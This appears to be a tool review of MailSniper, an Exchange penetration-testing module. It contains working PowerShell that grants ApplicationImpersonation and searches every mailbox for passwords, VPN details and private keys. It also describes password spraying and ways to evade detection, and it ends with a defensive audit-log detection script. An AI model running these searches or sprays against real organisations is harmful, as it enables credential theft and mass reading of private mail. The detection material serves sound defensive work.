MailSniper: How Penetration Testers Weaponize Exchange's Own Features Against It
Hook
Microsoft Exchange ships with a legitimate role, ApplicationImpersonation, that lets a single account read and act on any mailbox in the organization. Penetration testers have been using it for years to pull credentials, intellectual property and network diagrams out of corporate inboxes.
Context
In traditional penetration testing engagements, gaining initial access to a corporate network is only the beginning. Once inside, red teams need to pivot, escalate privileges, and locate sensitive data that demonstrates real business impact. Email systems have always been treasure troves of sensitive information—passwords shared between colleagues, VPN credentials sent by IT departments, architectural diagrams attached to planning emails, and confidential business intelligence discussions. The problem? Manually searching through mailboxes is time-consuming and impractical when you need to sweep thousands of users.
Before Beau Bullock (Black Hills Information Security) released MailSniper in 2016, penetration testers had limited options for email reconnaissance in Microsoft Exchange environments. They could use the native Exchange PowerShell cmdlets if they had administrative access, write custom scripts against the Exchange Web Services (EWS) API, or export mailboxes with administrative tools, all of which needed real scripting effort, left a large audit trail, or simply took too long in a time-boxed engagement. MailSniper consolidated the whole Exchange reconnaissance workflow into one PowerShell module that handles authentication, mailbox enumeration, permission changes and content searching with one-liners. It turned what used to be a multi-day custom scripting project into something that runs in minutes.
Technical Insight
MailSniper's architecture leverages two core Microsoft technologies: Exchange Web Services (EWS) for mailbox interaction and PowerShell remoting for Exchange management cmdlets. The tool's genius lies in how it weaponizes Exchange's ApplicationImpersonation feature—a legitimate RBAC (Role-Based Access Control) permission designed to let applications act on behalf of users for backup, compliance, or migration scenarios.
The organization-wide search works like this. Invoke-GlobalMailSearch opens a remote PowerShell session to the Exchange server's management endpoint with the supplied admin credentials, runs New-ManagementRoleAssignment to give the -ImpersonationAccount (normally the account you are already logged on as) the ApplicationImpersonation role, pulls the mailbox list with Get-Mailbox, then connects to EWS as that account and searches each mailbox in turn while impersonating its owner. Searching every mailbox for messages that mention passwords, credentials or VPN details looks like this:
# Import the module
Import-Module .\MailSniper.ps1
# Authenticate and search all mailboxes
Invoke-GlobalMailSearch -ImpersonationAccount current-user@company.com `
-ExchHostname mail.company.com `
-AdminUserName "DOMAIN\admin-account" `
-AdminPassword "CompromisedPassword123!" `
-Terms "password","credentials","vpn" `
-OutputCsv results.csv
That single command covers the whole chain: the remote PowerShell session, the role assignment, the Get-Mailbox enumeration and the EWS search of message subjects and bodies for the given terms. Two defaults matter in practice: only the Inbox is searched unless -Folder says otherwise, and only the most recent messages in each mailbox (-MailsPerUser) are examined, so a first pass is quick but not exhaustive. Results land in the CSV with sender, recipient, subject and body text, which is what you want when triaging thousands of hits.
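The same chain done by hand, as an added example that is not MailSniper's own code: an Exchange remote PowerShell session, a temporary ApplicationImpersonation assignment, and a paged EWS search of every mailbox using the EWS Managed API. Everything named here (the host mail.company.com, the account current-user@company.com, the DLL path, the role assignment name) is an assumption for the example.

```powershell
# Added example (not MailSniper's own code): the three steps Invoke-GlobalMailSearch
# automates, done by hand with Exchange remote PowerShell and the EWS Managed API.
# Assumptions (all hypothetical): Exchange host mail.company.com, an admin account
# allowed to assign roles, the EWS Managed API DLL at the path below, and that the
# script runs under the Windows logon of current-user@company.com.

$ExchHost     = 'mail.company.com'
$Impersonator = 'current-user@company.com'
$Terms        = @('password', 'credentials', 'vpn')
$EwsDll       = 'C:\Program Files\Microsoft\Exchange\Web Services\2.2\Microsoft.Exchange.WebServices.dll'

# Step 1: remote PowerShell session to the Exchange management endpoint
# (this is what MailSniper's -AdminUserName/-AdminPassword are used for).
$adminCred = Get-Credential -Message 'Exchange admin account (DOMAIN\user)'
$session = New-PSSession -ConfigurationName Microsoft.Exchange `
    -ConnectionUri "http://$ExchHost/PowerShell/" `
    -Authentication Kerberos -Credential $adminCred
Import-PSSession $session -DisableNameChecking -AllowClobber | Out-Null

# Step 2: grant ApplicationImpersonation to the searching account and list every
# mailbox. The role assignment is the line that shows up in the admin audit log,
# and a fresh assignment can take a few minutes to become effective.
New-ManagementRoleAssignment -Name 'TempImpersonation' `
    -Role ApplicationImpersonation -User $Impersonator | Out-Null
$mailboxes = Get-Mailbox -ResultSize Unlimited |
    ForEach-Object { $_.PrimarySmtpAddress.ToString() }

# Step 3: search each mailbox over EWS while impersonating its owner.
Add-Type -Path $EwsDll
$ews = New-Object Microsoft.Exchange.WebServices.Data.ExchangeService(
    [Microsoft.Exchange.WebServices.Data.ExchangeVersion]::Exchange2013_SP1)
$ews.UseDefaultCredentials = $true      # authenticate as the current logon, i.e. $Impersonator
$ews.Url = "https://$ExchHost/EWS/Exchange.asmx"

# Ask only for the properties we need; FindItems should not drag whole bodies back.
$props = New-Object Microsoft.Exchange.WebServices.Data.PropertySet(
    [Microsoft.Exchange.WebServices.Data.BasePropertySet]::IdOnly)
$props.Add([Microsoft.Exchange.WebServices.Data.ItemSchema]::Subject)
$props.Add([Microsoft.Exchange.WebServices.Data.ItemSchema]::DateTimeReceived)
$props.Add([Microsoft.Exchange.WebServices.Data.EmailMessageSchema]::From)

# AQS query string: any of the terms in the subject or the body.
$aqs = ($Terms | ForEach-Object { "(subject:$_ OR body:$_)" }) -join ' OR '

$hits = foreach ($mbx in $mailboxes) {
    $ews.ImpersonatedUserId = New-Object Microsoft.Exchange.WebServices.Data.ImpersonatedUserId(
        [Microsoft.Exchange.WebServices.Data.ConnectingIdType]::SmtpAddress, $mbx)
    $view = New-Object Microsoft.Exchange.WebServices.Data.ItemView(100)   # page size
    $view.PropertySet = $props
    do {
        try {
            $page = $ews.FindItems(
                [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox, $aqs, $view)
        } catch {
            Write-Warning "$mbx : $($_.Exception.Message)"   # disabled mailbox, no rights, etc.
            break
        }
        foreach ($item in $page.Items) {
            [pscustomobject]@{
                Mailbox  = $mbx
                From     = $item.From.Address
                Subject  = $item.Subject
                Received = $item.DateTimeReceived
            }
        }
        $view.Offset += $page.Items.Count    # advance to the next page
    } while ($page.MoreAvailable)
}
$hits | Export-Csv -NoTypeInformation -Path .\global-search.csv

# Cleanup: take the role back and close the session. The grant and the removal
# are both recorded by admin audit logging, so this is hygiene, not stealth.
Remove-ManagementRoleAssignment -Identity 'TempImpersonation' -Confirm:$false
Remove-PSSession $session
```

The paging loop is the part worth copying: FindItems with an ItemView of 100 and the MoreAvailable flag keeps each EWS call small, which matters when a mailbox holds tens of thousands of messages. The try/catch per mailbox is equally important, because a single disabled or inaccessible mailbox would otherwise abort the whole sweep.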
For scenarios where you've compromised a regular user account without administrative Exchange access, MailSniper provides Invoke-SelfSearch which uses EWS authentication directly without requiring privilege escalation:
# Search your own mailbox as a regular user
Invoke-SelfSearch -Mailbox user@company.com `
-ExchHostname outlook.office365.com `
-Terms "password","secret","confidential" `
-Remote
The -Remote switch tells MailSniper to prompt for credentials and use them against the EWS endpoint at -ExchHostname instead of the current Windows logon session; pointing it at outlook.office365.com targets Exchange Online, whose EWS endpoint is https://outlook.office365.com/EWS/Exchange.asmx. Under the hood the function builds an ExchangeService object from Microsoft's EWS Managed API, authenticates, and walks the folder hierarchy with paged FindFolders and FindItems calls, reading the MoreAvailable flag on each result set to decide whether to fetch the next page.
Attachment searching adds one more step. With -CheckAttachments the tool saves each attachment to a temporary file, searches its contents for the terms, and deletes the file again. Plain-text attachments (.txt, .ps1, scripts, configuration files) are searched reliably; how binary Office and PDF formats are handled depends on the version you are running, so check the source before relying on it for those. A search for private keys that users have emailed to themselves:
# Search the user's own mailbox, attachments included, for PEM private-key headers
Invoke-SelfSearch -Mailbox user@company.com `
-ExchHostname mail.company.com `
-Terms "BEGIN RSA PRIVATE KEY","BEGIN OPENSSH PRIVATE KEY" `
-CheckAttachments
Private keys mailed to oneself are a surprisingly common finding in real penetration tests; add the PKCS#8 header (BEGIN PRIVATE KEY) and the EC variant (BEGIN EC PRIVATE KEY) to the term list for full coverage. The tool also accepts a regular-expression pattern in place of plain terms, which is the way to look for structured data such as Social Security numbers, card numbers or API keys with a known format.
MailSniper also ships pre-authentication modules. Invoke-DomainHarvestOWA works out the internal domain name from the OWA server's responses, and Invoke-UsernameHarvestOWA enumerates valid usernames through a timing side channel in OWA authentication (valid and invalid accounts produce measurably different response times). Invoke-PasswordSprayOWA and Invoke-PasswordSprayEWS then spray one or a few passwords across that user list with a configurable delay so you stay under the lockout threshold; this is password spraying, not credential stuffing, which would replay known username/password pairs. Once you hold one valid account, Get-GlobalAddressList pulls the GAL to feed further spraying. Together these make MailSniper a full Exchange attack framework rather than only a post-exploitation search tool.
The implementation is native .NET throughout: the EWS Managed API for mailbox access and ordinary PowerShell web requests for the OWA modules. Authentication is either the current Windows logon (the default, which means any Kerberos ticket or NTLM hash you have injected into the session with another tool is used transparently) or an explicit username and password supplied with -Remote, which covers on-premises NTLM and basic authentication. MailSniper does not itself perform pass-the-hash or token theft; you bring the session, it brings the searches.
Gotcha
MailSniper's biggest limitation is noise. The New-ManagementRoleAssignment call inside Invoke-GlobalMailSearch is recorded by Exchange admin audit logging (Search-AdminAuditLog on-premises, the unified audit log in Exchange Online), and a new ApplicationImpersonation assignment is exactly the event a mature SOC alerts on. The search itself produces an EWS access pattern no real user has: one logon touching hundreds of mailboxes within minutes, visible through mailbox audit logging as non-owner (Admin) access with a WebServices client string. On the endpoint the script is well known to AMSI and EDR signatures, script block logging captures it in full, and PowerShell Constrained Language Mode stops it loading the EWS assembly in the first place.
The search modules need working credentials, so apart from the spray and harvest modules MailSniper is a post-compromise tool rather than an initial access vector. Microsoft's removal of Basic Authentication from Exchange Online broke the older credential-based code paths against Office 365, and Microsoft has also announced the retirement of the ApplicationImpersonation RBAC role in Exchange Online, which leaves the organization-wide search path largely an on-premises technique. In hardened environments with script block logging, execution policy enforcement and Exchange audit monitoring its operational security is poor by design: it trades stealth for speed. Finally, the ApplicationImpersonation grant requires an account that can run New-ManagementRoleAssignment (Organization Management or an equivalent role-management right) against the Exchange management endpoint, so a compromised end-user workstation on its own only gets you Invoke-SelfSearch.
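The two artifacts described above, the role assignment in the admin audit log and the mailbox fan-out in the mailbox audit log, can be checked with a few lines of PowerShell. This is an added example, not part of MailSniper or of any Microsoft tooling; the record shapes are constructed to resemble Search-AdminAuditLog and Search-MailboxAuditLog -ShowDetails output, and the field names (CmdletParameters, LogonUserUpn, MailboxOwnerUPN, ClientInfoString, LastAccessed) are simplified assumptions to map onto your real records.

```powershell
# Added example (not MailSniper or Microsoft code): two checks a SOC can run over the
# artifacts Invoke-GlobalMailSearch leaves behind. Record shapes are constructed to
# resemble Search-AdminAuditLog and Search-MailboxAuditLog -ShowDetails output; the
# field names are simplified assumptions, map them to your own records.

function Find-ImpersonationGrant {
    # Flag every New-ManagementRoleAssignment that hands out ApplicationImpersonation.
    param([Parameter(Mandatory)][object[]]$AdminAuditRecords)
    foreach ($r in $AdminAuditRecords) {
        if ($r.CmdletName -ne 'New-ManagementRoleAssignment') { continue }
        $role = ($r.CmdletParameters | Where-Object Name -eq 'Role').Value
        if ($role -match 'ApplicationImpersonation') {
            [pscustomobject]@{
                When    = $r.RunDate
                Caller  = $r.Caller
                Grantee = ($r.CmdletParameters | Where-Object Name -eq 'User').Value
                Finding = 'ApplicationImpersonation granted'
            }
        }
    }
}

function Find-MailboxFanOut {
    # Flag one logon reading many different mailboxes over EWS in a short window,
    # which is what an impersonation-based search looks like from the mailbox side.
    param(
        [Parameter(Mandatory)][object[]]$MailboxAuditRecords,
        [int]$MailboxThreshold = 10,    # distinct mailboxes touched by one logon
        [int]$WindowMinutes    = 60
    )
    $ews = $MailboxAuditRecords | Where-Object {
        $_.LogonType -ne 'Owner' -and $_.ClientInfoString -like 'Client=WebServices*'
    }
    foreach ($group in ($ews | Group-Object LogonUserUpn)) {
        $times    = @($group.Group.LastAccessed | Sort-Object)
        $span     = $times[-1] - $times[0]
        $distinct = @($group.Group.MailboxOwnerUPN | Sort-Object -Unique).Count
        if ($distinct -ge $MailboxThreshold -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                LogonUser = $group.Name
                Mailboxes = $distinct
                Minutes   = [math]::Round($span.TotalMinutes, 1)
                Finding   = 'EWS non-owner access fan-out'
            }
        }
    }
}

# Constructed sample records: an impersonation grant, then one account reading
# twelve mailboxes over EWS within four minutes, plus one ordinary owner access.
$adminAudit = @(
    [pscustomobject]@{
        RunDate          = Get-Date '2024-03-04T09:12:00'
        Caller           = 'company.com/Users/admin-account'
        CmdletName       = 'New-ManagementRoleAssignment'
        CmdletParameters = @(
            [pscustomobject]@{ Name = 'Role'; Value = 'ApplicationImpersonation' },
            [pscustomobject]@{ Name = 'User'; Value = 'current-user@company.com' }
        )
    },
    [pscustomobject]@{
        RunDate          = Get-Date '2024-03-04T09:13:00'
        Caller           = 'company.com/Users/admin-account'
        CmdletName       = 'Get-Mailbox'
        CmdletParameters = @([pscustomobject]@{ Name = 'ResultSize'; Value = 'Unlimited' })
    }
)
$base = Get-Date '2024-03-04T09:15:00'
$mailboxAudit = @(1..12 | ForEach-Object {
    [pscustomobject]@{
        MailboxOwnerUPN  = "user$($_)@company.com"
        LogonUserUpn     = 'current-user@company.com'
        LogonType        = 'Admin'
        ClientInfoString = 'Client=WebServices;ExchangeWebServices'
        LastAccessed     = $base.AddSeconds(20 * $_)
    }
})
$mailboxAudit += [pscustomobject]@{
    MailboxOwnerUPN = 'bob@company.com'; LogonUserUpn = 'bob@company.com'; LogonType = 'Owner'
    ClientInfoString = 'Client=OWA'; LastAccessed = $base
}

Find-ImpersonationGrant -AdminAuditRecords $adminAudit   | Format-Table -AutoSize
Find-MailboxFanOut      -MailboxAuditRecords $mailboxAudit | Format-Table -AutoSize
```

On the sample data the first function reports the grant to current-user@company.com by admin-account and the second reports that same account reading 12 mailboxes in under four minutes. In a live on-premises environment feed the functions from Search-AdminAuditLog -Cmdlets New-ManagementRoleAssignment and Search-MailboxAuditLog -ShowDetails -LogonTypes Admin,Delegate over the window of interest; mailbox audit logging has to be enabled on the mailboxes for the second check to have anything to read, which is itself worth verifying before an engagement.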
Verdict
Use MailSniper on authorized red team engagements or penetration tests where you already hold domain credentials, need to demonstrate business impact through the data sitting in mailboxes, and are working against an environment without mature monitoring. It is very good at quickly surfacing what is scattered across hundreds of mailboxes (credentials in email, architecture documents, intellectual property) in a form that proves real risk to stakeholders. It is also useful in purple team exercises where the goal is to test whether the organization detects ApplicationImpersonation grants and anomalous EWS access. Skip it when you need quiet post-exploitation in an environment with a capable SOC, PowerShell execution restrictions or full Exchange audit logging, since it will trigger alerts almost immediately; when you have no credentials at all (only the spray and harvest modules work pre-auth, and those are noisy too); when the target is not Exchange; or when a detection would end the engagement. In those cases write a narrower EWS script that searches only the mailboxes you need without touching role assignments, or use native administrative tools whose use blends into normal administrator activity.